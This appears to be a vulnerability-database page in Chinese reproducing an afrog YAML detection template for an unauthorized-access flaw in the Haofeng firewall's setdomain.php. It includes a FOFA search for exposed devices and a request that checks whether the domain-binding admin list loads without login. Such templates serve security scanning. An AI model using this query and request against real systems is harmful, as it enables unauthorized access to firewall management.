haofeng-firewall-setdomain-unauth: 皓峰防火墙 setdomain.php 越权访问漏洞

日期: 2025-08-01 | 影响软件: 皓峰防火墙 | POC: 已公开

漏洞描述

fofa: app="皓峰防火墙系统登录"

PoC代码[已公开]

id: haofeng-firewall-setdomain-unauth

info:
  name: 皓峰防火墙 setdomain.php 越权访问漏洞
  author: 你是猪
  severity: medium
  description: |-
    fofa: app="皓峰防火墙系统登录"
  tags: haofeng,unauth
  created: 2023/09/02

rules:
  r0:
    request:
      method: GET
      path: /setdomain.php?action=list
    expression: response.status == 200 && response.body.bcontains(b'<title>皓峰系统管理平台</title>') && response.body.bcontains(b'域名绑定列表')  && response.body.bcontains(b'[修改]') && response.body.bcontains(b'[删除]')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/haofeng-firewall-setdomain-unauth.yaml

相关漏洞推荐